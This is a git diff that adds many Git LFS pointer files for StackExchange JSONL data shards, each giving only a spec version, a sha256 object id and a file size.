0000000000000000000000000000000000000000..1be6efac5e911bc62d6112c79afc2da3e9b26e1d --- /dev/null +++ b/data/stackexchange/1-1/1438_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47bd79d063f8fe2d43efdfafd8c549b609d74108eafeb5f2e563b33a4d582812 +size 36441029 diff --git a/data/stackexchange/1-1/1439_2289.jsonl b/data/stackexchange/1-1/1439_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..068841078c26d3d02465773a8cf1de6d41e52aa8 --- /dev/null +++ b/data/stackexchange/1-1/1439_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1dfd3d86d218b7ab6a3052887e9bc12dde5b8386cbd47069aeb87662677906f +size 43098092 diff --git a/data/stackexchange/1-1/143_2289.jsonl b/data/stackexchange/1-1/143_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9121ddeb5a7b2035136decac7d57cc5c43ea93d6 --- /dev/null +++ b/data/stackexchange/1-1/143_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41e7ca7ec0295b621812e4376be8e867ad69402478d9567141123f4e3e2511f1 +size 33734349 diff --git a/data/stackexchange/1-1/1440_2289.jsonl b/data/stackexchange/1-1/1440_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8fcebe926c93ee9f25dfd1c542c9775c8c9b7b5 --- /dev/null +++ b/data/stackexchange/1-1/1440_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d012cc6538e7aa623044785a75a04a311da81b63e32415f3f90defb985e0be8 +size 42671455 diff --git a/data/stackexchange/1-1/1441_2289.jsonl b/data/stackexchange/1-1/1441_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b622b4631a38b24387f14248065f4ce6c0311e0 --- /dev/null +++ b/data/stackexchange/1-1/1441_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22b577831f8b7e7cd2c78cb645e5393a35ae534575aa2c1bf4e6b74492e0b232 +size 42132889 diff --git a/data/stackexchange/1-1/1442_2289.jsonl b/data/stackexchange/1-1/1442_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12e04f542780051d16a04c05e31465b577673ef6 --- /dev/null +++ b/data/stackexchange/1-1/1442_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5df2fe0b1c959fcbdcb0341371d975d56d2ec5b1e539b5329c68f9923bfe8e8 +size 43168804 diff --git a/data/stackexchange/1-1/1443_2289.jsonl b/data/stackexchange/1-1/1443_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f9700a7e2c1e7b9ea0e068adf4b2de788d28832 --- /dev/null +++ b/data/stackexchange/1-1/1443_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:8b47e8a20089bc54af0e2dfd8a7a93e4db48826ce165551b17a74ad1a65d6cec +size 42960608 diff --git a/data/stackexchange/1-1/1444_2289.jsonl b/data/stackexchange/1-1/1444_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36d19ed9c898302f7facf7dcef6ba0daa431fb26 --- /dev/null +++ b/data/stackexchange/1-1/1444_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63c4619feef5c0db77991902fbf4d4ede1efe2a799241d9d0e62a8707a617edb +size 43229790 diff --git a/data/stackexchange/1-1/1445_2289.jsonl b/data/stackexchange/1-1/1445_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1209c418ec70eb0eded641949e9cc5bdfa29c18 --- /dev/null +++ b/data/stackexchange/1-1/1445_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23e3479ff5209901173d9be3f8ede36a0349abef0d8b105db4f1e5a90d661466 +size 43832555 diff --git a/data/stackexchange/1-1/1446_2289.jsonl b/data/stackexchange/1-1/1446_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2df954d84f0d75b36768b639fe48a4ab452fec7a --- /dev/null +++ b/data/stackexchange/1-1/1446_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:affbd623ebd8b43d1efae26d8ba66c179538fe1d3fb180bdb81a7a0452160dd3 +size 42699276 diff --git a/data/stackexchange/1-1/1447_2289.jsonl b/data/stackexchange/1-1/1447_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6acdd375d80792a06a1a882234ef309083a7639e --- /dev/null +++ b/data/stackexchange/1-1/1447_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b54af87752625e5df41334b11a934fb40529585d80d4c677edbb3169591009b +size 42720611 diff --git a/data/stackexchange/1-1/1448_2289.jsonl b/data/stackexchange/1-1/1448_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..914c49bf74bf2714a6a04c9df68103a7399e0a15 --- /dev/null +++ b/data/stackexchange/1-1/1448_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d70eb889e15a521f25162818cbc799cd8116af2003e018ceafc671f5d83141f +size 42501622 diff --git a/data/stackexchange/1-1/1449_2289.jsonl b/data/stackexchange/1-1/1449_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cdef2640dfc6e971db26094740a9d279e7ed424 --- /dev/null +++ b/data/stackexchange/1-1/1449_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b129ce451bbbd32e58fdab8980a726b18a78676d7e50ef3723a5ef0586b04d28 +size 43193163 diff --git a/data/stackexchange/1-1/144_2289.jsonl b/data/stackexchange/1-1/144_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed792ce2b005c52f62be922dece9ecea154ff99e --- /dev/null +++ b/data/stackexchange/1-1/144_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3171d237013090229dbc9a9075c8ed5e46353c15bbae8c473544b9388242faa +size 34169290 diff --git a/data/stackexchange/1-1/1450_2289.jsonl b/data/stackexchange/1-1/1450_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e10959dedd04703b0a101c695f293c61c236873a --- /dev/null +++ b/data/stackexchange/1-1/1450_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50318c6ae84e01f31d310dfe6b8be0b3f80a37346398c312cb4d1493a50304f3 +size 42953314 diff --git a/data/stackexchange/1-1/1451_2289.jsonl b/data/stackexchange/1-1/1451_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..ee419a4a3c14c873198a0fa8c3d2e374f375842e --- /dev/null +++ b/data/stackexchange/1-1/1451_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d9a5fd8fdb3282ee1ab5283a214b918140b60ddd129a715c4827a1091491890e +size 43187936 diff --git a/data/stackexchange/1-1/1452_2289.jsonl b/data/stackexchange/1-1/1452_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95e41afb3da38b7ab53f69ff176454d87af61a1e --- /dev/null +++ b/data/stackexchange/1-1/1452_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4af4721ba2e6fac22d7f6f585917016a8cb9e3014dbdc9dca4381b4b56e9aca +size 43373987 diff --git a/data/stackexchange/1-1/1453_2289.jsonl b/data/stackexchange/1-1/1453_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40d60b2f609f094a986e63ed809d8251d00a7783 --- /dev/null +++ b/data/stackexchange/1-1/1453_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1513401548afb58215d65af9ef8fbd0e6fe9c07c63bcb170229d1768f7a0a9b +size 43682164 diff --git a/data/stackexchange/1-1/1454_2289.jsonl b/data/stackexchange/1-1/1454_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53883c0ab0e3feb4695ae51059ef1cdddee28ebf --- /dev/null +++ b/data/stackexchange/1-1/1454_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7747c61a8a4196e6e6146d761952e0fe70d7bd2b1327bfcfdf0308ee4b019525 +size 42245793 diff --git a/data/stackexchange/1-1/1455_2289.jsonl b/data/stackexchange/1-1/1455_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f069b89750a2666dd8f6af8f8ba823afbf2b270 --- /dev/null +++ b/data/stackexchange/1-1/1455_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4580f86d0da4c846fc2872c8cde505746ad366b513f5912766fcacf3767050a7 +size 43792626 diff --git a/data/stackexchange/1-1/1456_2289.jsonl b/data/stackexchange/1-1/1456_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fa3b94f32d78396a0b0457ed55042d6717f4019a --- /dev/null +++ b/data/stackexchange/1-1/1456_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05b4677ea8c89fb9cbcb7d5b7d6c178e0190a2716dcdc0f59a08fd77e9780712 +size 43551746 diff --git a/data/stackexchange/1-1/1457_2289.jsonl b/data/stackexchange/1-1/1457_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fbf04604ebc22de410c8db386ea1ef655c6697a1 --- /dev/null +++ b/data/stackexchange/1-1/1457_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d3ce92487f3df72481418fbe011352de6e63e8680b1206a6c6a5cfaeb893e6d2 +size 43255805 diff --git a/data/stackexchange/1-1/1458_2289.jsonl b/data/stackexchange/1-1/1458_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..787a08dfee10b39ad3f60dec95ebe1c06ed7daef --- /dev/null +++ b/data/stackexchange/1-1/1458_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b38de1ff494acaa0c7b36d1c1f3df9cec97f445f6e5d73a4d95db27762934018 +size 43103415 diff --git a/data/stackexchange/1-1/1459_2289.jsonl b/data/stackexchange/1-1/1459_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7923f04b585e8161cf85d27e111bff4d40f50481 --- /dev/null +++ b/data/stackexchange/1-1/1459_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:becdaa0c74f108db9a04164e1b5e7c4147114368fda2384c9209ec8423da5384 +size 43421424 diff --git a/data/stackexchange/1-1/145_2289.jsonl b/data/stackexchange/1-1/145_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13a3d22c876e050734c2653e41412ecf3202840e --- /dev/null +++ b/data/stackexchange/1-1/145_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01aa3fbf32c91c340aa63eab61a50c5b8a3b257d839816942942f0ad7d3a0614 +size 33685701 diff --git a/data/stackexchange/1-1/1460_2289.jsonl b/data/stackexchange/1-1/1460_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3d10efca30fbe48338c31a62bdb2b4a1beaa46c --- /dev/null +++ b/data/stackexchange/1-1/1460_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:408d79e0f8689dc3bac1f92ad0cea7dbbac66d6f12fcc0f7982be34be29b51dd +size 42978850 diff --git a/data/stackexchange/1-1/1461_2289.jsonl b/data/stackexchange/1-1/1461_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f8ddcead89e6b62406955b32cf1c01cae8adc40 --- /dev/null +++ b/data/stackexchange/1-1/1461_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71295da2ed603383b3e02464f7a74cf361cc2b7988dcdb21ab346e41891dc86f +size 44262721 diff --git a/data/stackexchange/1-1/1462_2289.jsonl b/data/stackexchange/1-1/1462_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f9fbb65c78dfdecb9912bfd86603af9bf1ba0935 --- /dev/null +++ b/data/stackexchange/1-1/1462_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:415c39bb939f00babd2e5853185f0884bec3650bd82012c9a633c14249f7e090 +size 42841382 diff --git a/data/stackexchange/1-1/1463_2289.jsonl b/data/stackexchange/1-1/1463_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..feaff53af6a1af92ea6574850a3e4c6cfd39380a --- /dev/null +++ b/data/stackexchange/1-1/1463_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:592fe845581210614a1589a9aa11d72b794dae058d0fb2c23a3b6cb47d0af5ea +size 42118132 diff --git a/data/stackexchange/1-1/1464_2289.jsonl b/data/stackexchange/1-1/1464_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ecd99efc262c2ef2d91e153fbcba5f3782d86b7 --- /dev/null +++ b/data/stackexchange/1-1/1464_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a942059c2005cddcc97e04e955ae8742cfc872f8443e0ba7b136f53c8efdc0b +size 43096278 diff --git a/data/stackexchange/1-1/1465_2289.jsonl b/data/stackexchange/1-1/1465_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe66e5bbe0f7a4732409760ec2acc4b4f395e3bb --- /dev/null +++ b/data/stackexchange/1-1/1465_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8bd4e51c531a7a6aa9642b877ea2dca2e9ed485a24c9fc8c5276692d75ecb77 +size 42926038 diff --git a/data/stackexchange/1-1/1466_2289.jsonl b/data/stackexchange/1-1/1466_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d77f94db0edaf4a30da8c12a7946b5950ab28b4 --- /dev/null +++ b/data/stackexchange/1-1/1466_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b832056f6c8f214656ac24764a3256a0f8e38c89a760f8f5743c4aee3f04daf +size 42811806 diff --git a/data/stackexchange/1-1/1467_2289.jsonl b/data/stackexchange/1-1/1467_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..9e7631bed56304debea0dc579f87f1ec92e1f232 --- /dev/null +++ b/data/stackexchange/1-1/1467_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a5afced7ca85b8266ee23a077f841a8cb14668de6aa11fb644429d6ff5a30fe +size 42807950 diff --git a/data/stackexchange/1-1/1468_2289.jsonl b/data/stackexchange/1-1/1468_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7423b20788a0f0710a46bbaa5f65d5ea99a7dd01 --- /dev/null +++ b/data/stackexchange/1-1/1468_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c1ac819e8350c187e93d57caa4f86afba1b3587599ff2f5772b8ca2b687854f +size 42738897 diff --git a/data/stackexchange/1-1/1469_2289.jsonl b/data/stackexchange/1-1/1469_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3261157e20ac39edb5892938ae95a7a9e6252856 --- /dev/null +++ b/data/stackexchange/1-1/1469_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d89da53fd0a2105cd020cbbcd8645a34ed80cf4b11c7dc4b29bbfd94dbaa462e +size 42944481 diff --git a/data/stackexchange/1-1/146_2289.jsonl b/data/stackexchange/1-1/146_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dcc6e71a9a75382695d5713d2ff63a88892582b4 --- /dev/null +++ b/data/stackexchange/1-1/146_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5ddf90a63acc56188ff430a455f24e659f93c78973324e8540e01bf7d411683 +size 33455818 diff --git a/data/stackexchange/1-1/1470_2289.jsonl b/data/stackexchange/1-1/1470_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f583155d12d176c66d5117d0e67886db428ccce --- /dev/null +++ b/data/stackexchange/1-1/1470_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1955705b237c9491038bf6c494140957e6aec5c6208f63904a69c404fcc5d0f4 +size 43468481 diff --git a/data/stackexchange/1-1/1471_2289.jsonl b/data/stackexchange/1-1/1471_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf3fd53f45fd8ac4916b09cc26a8fc21e458fe56 --- /dev/null +++ b/data/stackexchange/1-1/1471_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e44990778b775d64b22adc15fbac708c739e55e67bb7d03010c58c33fb8b6e0d +size 42796068 diff --git a/data/stackexchange/1-1/1472_2289.jsonl b/data/stackexchange/1-1/1472_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c259e5c9c44bd15803f4d010bb69c54604a5c13 --- /dev/null +++ b/data/stackexchange/1-1/1472_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9572d77460712fe98770a9caab80b9b894711f402743906e26a548e1bb0eedd1 +size 43202870 diff --git a/data/stackexchange/1-1/1473_2289.jsonl b/data/stackexchange/1-1/1473_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23fef69ee5b609f0c95f744da9b248ff328c46b2 --- /dev/null +++ b/data/stackexchange/1-1/1473_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:78e81c7aa0dbef5081d7178475490c8cf18a614aa059f4016c52c5506bacf324 +size 42519024 diff --git a/data/stackexchange/1-1/1474_2289.jsonl b/data/stackexchange/1-1/1474_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e59699f460a6da860f279b06228aa61d3ec65cd2 --- /dev/null +++ b/data/stackexchange/1-1/1474_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:0abcece2b5962d84cf25d8521f0fb7ad5299bdde15e5f474b472b628e17807d2 +size 42927417 diff --git a/data/stackexchange/1-1/1475_2289.jsonl b/data/stackexchange/1-1/1475_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2715705448be3c575aa9d4b766ae9b25eaa6649 --- /dev/null +++ b/data/stackexchange/1-1/1475_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f5218e614a1143e1d1f08aecf3dd0951eb6c09fcdd0235f8736d2cb26ae9980 +size 42891892 diff --git a/data/stackexchange/1-1/1476_2289.jsonl b/data/stackexchange/1-1/1476_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..543202a544458a854f8bb7c0df45582089101454 --- /dev/null +++ b/data/stackexchange/1-1/1476_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58ffb8e2bf14497becc639aace0f48bf9efac8a44bf230fd928eceb292f71e6b +size 43103459 diff --git a/data/stackexchange/1-1/1477_2289.jsonl b/data/stackexchange/1-1/1477_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f26642eb183b1d5c2d9350a121b8f736b89a910c --- /dev/null +++ b/data/stackexchange/1-1/1477_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef64a21625fb865d92146f466ebd73762cdf00baf8bf2e5358ed347b454fffea +size 42966645 diff --git a/data/stackexchange/1-1/1478_2289.jsonl b/data/stackexchange/1-1/1478_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97bf86b18cd417c790b78fd3cf1ffbae823e5a66 --- /dev/null +++ b/data/stackexchange/1-1/1478_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9541715903c19e3754e663e00f5b29dbf8a860932cc02f46e1493e26c4f319df +size 42775636 diff --git a/data/stackexchange/1-1/1479_2289.jsonl b/data/stackexchange/1-1/1479_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e2c382a502cf403a379896cc5c2dc4692654df8 --- /dev/null +++ b/data/stackexchange/1-1/1479_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8acf1cce9b57f1a658e3750cb9b4ea73d933cff76d6286e4a6d810eaccf14c28 +size 43632366 diff --git a/data/stackexchange/1-1/147_2289.jsonl b/data/stackexchange/1-1/147_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e9579d73bf69335bc1ef2540d04b32d7d7262ec4 --- /dev/null +++ b/data/stackexchange/1-1/147_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e61125e93a544e4b961d70de898dd678c62a50dcd6fd6e7eec60731371d69da4 +size 33692694 diff --git a/data/stackexchange/1-1/1480_2289.jsonl b/data/stackexchange/1-1/1480_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b34c6fd26ad0f3798c5922f2712225ffeaccb24 --- /dev/null +++ b/data/stackexchange/1-1/1480_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e476a20d1f3180eb08f0841d252e99ea6cf11f5e37f06aa9c0d8025d4dc38994 +size 42402418 diff --git a/data/stackexchange/1-1/1481_2289.jsonl b/data/stackexchange/1-1/1481_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7ed79f6c1ae4e0205481653b2f7f575b2b18e23 --- /dev/null +++ b/data/stackexchange/1-1/1481_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6643a0a6fcaa978d2931293c77a3af83a293d62da8e53f9a6f2d11a72e50e00c +size 42674854 diff --git a/data/stackexchange/1-1/1482_2289.jsonl b/data/stackexchange/1-1/1482_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..cb568bd086b0d5c39bda178bc5ec5e2e31c5ce76 --- /dev/null +++ b/data/stackexchange/1-1/1482_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e18e139eb3afed3d9654291b8a6603fe9f16a39a7033b531efcf9dfe61de0a42 +size 42720951 diff --git a/data/stackexchange/1-1/1483_2289.jsonl b/data/stackexchange/1-1/1483_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a072764e582764bb7a3860baeb17495f0b4f4d6 --- /dev/null +++ b/data/stackexchange/1-1/1483_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:167066a2128d577b66874d89c1c44990e2e2cc5a6c1470dadd49f0c02ed4d1b3 +size 42747304 diff --git a/data/stackexchange/1-1/1484_2289.jsonl b/data/stackexchange/1-1/1484_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5903027623c878bb8da00069103658250490bfd7 --- /dev/null +++ b/data/stackexchange/1-1/1484_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80b46c75fa3a07adfa8f93bb51df645ba84c4acb3a6701035950c99575c436b2 +size 42831219 diff --git a/data/stackexchange/1-1/1485_2289.jsonl b/data/stackexchange/1-1/1485_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d6b01b03263311bc6775d21db3bfc9a67b640318 --- /dev/null +++ b/data/stackexchange/1-1/1485_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b70906615ccbe22bfafdba241a5a30654e5e4fd064ede78cbf0d7d357468f5e5 +size 43069289 diff --git a/data/stackexchange/1-1/1486_2289.jsonl b/data/stackexchange/1-1/1486_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f69e3dde67df6f58b3b80d5f1503a50032fa8d41 --- /dev/null +++ b/data/stackexchange/1-1/1486_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1bd56b8eb3429a7fb8abc75d027dfcfee03b33d1f6bfe3ca0738e4c5a03bd7bb +size 43745262 diff --git a/data/stackexchange/1-1/1487_2289.jsonl b/data/stackexchange/1-1/1487_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..43a5b6d3b4c49ff378fe40fa5853450524234d47 --- /dev/null +++ b/data/stackexchange/1-1/1487_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bdf7b608cac68048309a7a7f7c6bf9c5b89e6509a121afdeec6b21d0c2b45e54 +size 42693486 diff --git a/data/stackexchange/1-1/1488_2289.jsonl b/data/stackexchange/1-1/1488_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c28112ef44c81682cfbeec9854dfdf5025ec15b --- /dev/null +++ b/data/stackexchange/1-1/1488_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b7ed94992092522aa5f76b79e47b398d0e3eab3f7c45da161fb32f93f3fceb8 +size 42886583 diff --git a/data/stackexchange/1-1/1489_2289.jsonl b/data/stackexchange/1-1/1489_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f5270ed3862914acbf9a7400b3062a434926c827 --- /dev/null +++ b/data/stackexchange/1-1/1489_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb28f35dc0d1d1a0640b0d2e1d270e2950d28ff6533464d8dacea29274ccf049 +size 35498250 diff --git a/data/stackexchange/1-1/148_2289.jsonl b/data/stackexchange/1-1/148_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbc342744e3ed9290393879a5a9c1d6d3f39d277 --- /dev/null +++ b/data/stackexchange/1-1/148_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:8b938f2852f7aa33bb297b34333e743eeb4afe194f25f8c1fffd4d25369be52f +size 34015423 diff --git a/data/stackexchange/1-1/1490_2289.jsonl b/data/stackexchange/1-1/1490_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..433d47b7de04964e6603b44ac26597d318c1f05a --- /dev/null +++ b/data/stackexchange/1-1/1490_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ee09138a6b714118326173a92c2ba1b482677b7c966a036e7645680cd5e461e +size 34365669 diff --git a/data/stackexchange/1-1/1491_2289.jsonl b/data/stackexchange/1-1/1491_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8384cb21d7c10b2674b063737ec4d8810c23463a --- /dev/null +++ b/data/stackexchange/1-1/1491_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46c03afbe597b971778fc6f07d2a6c20d52e6d727abe5c2c66d0a999f28b216e +size 34277622 diff --git a/data/stackexchange/1-1/1492_2289.jsonl b/data/stackexchange/1-1/1492_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..826ab5ec602574180a53c1bf59997b07eba1111a --- /dev/null +++ b/data/stackexchange/1-1/1492_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a3cb12c21c6e93ba693dc50c03ab0ce62ac1b593057c2bb1f7338a6d5ca9b9f +size 35000803 diff --git a/data/stackexchange/1-1/1493_2289.jsonl b/data/stackexchange/1-1/1493_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf1a3d2a1affbeb4acb131f2cb6488c7b8e649ac --- /dev/null +++ b/data/stackexchange/1-1/1493_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e45ca0a99e8c125c46ee5d09633beb3be10d60d627127c66fc06057dd53a8f69 +size 34700357 diff --git a/data/stackexchange/1-1/1494_2289.jsonl b/data/stackexchange/1-1/1494_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..324d1c4922a4c194dce6834a8d56754ef0497204 --- /dev/null +++ b/data/stackexchange/1-1/1494_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2241ab0cd056d2d86733183ec049bda9cd558d7731e96a2dabeedb23d58f65e +size 34114164 diff --git a/data/stackexchange/1-1/1495_2289.jsonl b/data/stackexchange/1-1/1495_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7d6727ae7e81e8d76c6f42538db651f8324d59e --- /dev/null +++ b/data/stackexchange/1-1/1495_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5730845b992f8a15d4792f480e97491c8fd3487f7a566e1d79daddc0d4585c23 +size 34315009 diff --git a/data/stackexchange/1-1/1496_2289.jsonl b/data/stackexchange/1-1/1496_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4d7645d04db480c5bf79e5e0ef92c208db6cd13 --- /dev/null +++ b/data/stackexchange/1-1/1496_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee14cd73f9755faa3d3b189b3cbf78d3f1a76c7485856f5ae59a9270a5e12d38 +size 34591942 diff --git a/data/stackexchange/1-1/1497_2289.jsonl b/data/stackexchange/1-1/1497_2289.jsonl new file mode 100644 index 